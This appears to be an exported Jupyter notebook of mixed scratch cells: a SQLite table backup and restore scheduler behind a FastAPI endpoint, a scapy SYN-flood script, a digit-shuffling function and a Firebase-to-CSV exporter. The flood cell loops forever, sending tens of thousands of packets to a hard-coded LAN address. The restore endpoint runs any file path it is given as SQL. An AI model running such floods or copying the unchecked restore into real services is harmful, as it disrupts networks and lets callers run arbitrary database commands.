In [2]:
pip install schedule

  Obtaining dependency information for schedule from https://files.pythonhosted.org/packages/20/a7/84c96b61fd13205f2cafbe263cdb2745965974bdf3e0078f121dfeca5f02/schedule-1.2.2-py3-none-any.whl.metadata
Note: you may need to restart the kernel to use updated packages.


In [4]:
import os
import time
import schedule
import sqlite3
from datetime import datetime
from sqlalchemy import create_engine, MetaData
from sqlalchemy.orm import sessionmaker

DATABASE_URL = "sqlite:///./temp.db"  # Update this URL to match your database
BACKUP_DIR = 'backups'

def get_engine():
    return create_engine(DATABASE_URL)

def backup_table(engine, table_name):
    timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
    backup_file = os.path.join(BACKUP_DIR, f"{table_name}_backup_{timestamp}.sql")

    with sqlite3.connect(engine.url.database) as conn:
        with open(backup_file, 'w') as f:
            for line in conn.iterdump():
                if line.startswith(f'INSERT INTO "{table_name}"'):
                    f.write(f'{line}\n')

    print(f"Backup for table {table_name} created at {backup_file}")

def backup_database():
    if not os.path.exists(BACKUP_DIR):
        os.makedirs(BACKUP_DIR)

    engine = get_engine()
    metadata = MetaData(bind=engine)
    metadata.reflect()

    for table_name in metadata.tables.keys():
        backup_table(engine, table_name)

schedule.every(5).minutes.do(backup_database)

def run_scheduler():
    while True:
        schedule.run_pending()
        time.sleep(1)

def restore_table(engine, table_name, backup_file):
    with sqlite3.connect(engine.url.database) as conn:
        cursor = conn.cursor()
        
        # Remove existing data from the table
        cursor.execute(f'DELETE FROM "{table_name}";')
        
        # Restore data from the backup file
        with open(backup_file, 'r') as f:
            sql_script = f.read()
            conn.executescript(sql_script)

    print(f"Data for table {table_name} restored from {backup_file}")


In [5]:
import threading
from fastapi import FastAPI, HTTPException

app = FastAPI()

@app.on_event("startup")
def startup_event():
    backup_thread = threading.Thread(target=run_scheduler)
    backup_thread.start()

@app.post("/restore-table/")
async def restore_table_endpoint(table_name: str, backup_file: str):
    engine = get_engine()
    if not os.path.exists(backup_file):
        raise HTTPException(status_code=404, detail="Backup file not found")
    
    try:
        restore_table(engine, table_name, backup_file)
    except Exception as e:
        raise HTTPException(status_code=500, detail=str(e))
    
    return {"message": f"Table {table_name} restored successfully from {backup_file}"}

@app.get("/")
async def root():
    return {"message": "Hello World"}

if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, host="0.0.0.0", port=int(os.getenv("PORT", 3000)))

RuntimeError: asyncio.run() cannot be called from a running event loop

In [1]:
pip install scapy

Note: you may need to restart the kernel to use updated packages.


In [ ]:
from scapy.all import *

def syn_flood(target_ip, target_port, packet_count):
    for _ in range(packet_count):
        ip = IP(dst=target_ip)
        tcp = TCP(dport=target_port, flags="SAF")
        pkt = ip / tcp
        send(pkt, verbose=False)
    print(f"Sent {packet_count} SYN packets to {target_ip}:{target_port}")

if __name__ == "__main__":
    while True:
        target_ip = "192.168.18.220"  # Replace with your target IP
        target_port = 8000  # Replace with your target port
        packet_count = 60000  # Number of packets to send

        syn_flood(target_ip, target_port, packet_count)


In [3]:
def compress_its(its: int) -> str:
    its = str(its)
    if len(its) == 11:
        indices = [6, 5, 2, 7, 4, 0, 9, 8]
        compressed_its = ''.join(its[i] for i in indices)
        return compressed_its
    return its


In [4]:
compress_its(734960436221)

Exception ignored in: <function SuperSocket.__del__ at 0x000001B8D9BE3DC0>
Traceback (most recent call last):
  File "c:\Users\abbas\.conda\envs\Uni\lib\site-packages\scapy\supersocket.py", line 134, in __del__
    self.close()
  File "c:\Users\abbas\.conda\envs\Uni\lib\site-packages\scapy\arch\windows\native.py", line 190, in close
    self.ins.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
AttributeError: 'L3WinSocket' object has no attribute 'ins'


TypeError: object of type 'int' has no len()

In [ ]:
import firebase_admin
from firebase_admin import credentials, db
import csv

# Initialize Firebase Admin SDK
cred = credentials.Certificate('path/to/serviceAccountKey.json')
firebase_admin.initialize_app(cred, {
    'databaseURL': 'https://your-database-name.firebaseio.com/'
})

def fetch_data_from_firebase():
    # Reference to your database
    ref = db.reference('path/to/your/data')
    return ref.get()

def save_data_to_csv(data, file_name):
    # Extract headers from data keys
    headers = set()
    for entry in data.values():
        headers.update(entry.keys())
    headers = sorted(headers)

    # Write data to CSV
    with open(file_name, mode='w', newline='') as csv_file:
        writer = csv.DictWriter(csv_file, fieldnames=headers)
        writer.writeheader()
        for key, value in data.items():
            writer.writerow(value)

def main():
    # Fetch data from Firebase
    data = fetch_data_from_firebase()
    if data:
        # Save data to CSV
        save_data_to_csv(data, 'firebase_data.csv')
        print("Data saved to firebase_data.csv")
    else:
        print("No data found in Firebase.")

if __name__ == "__main__":
    main()
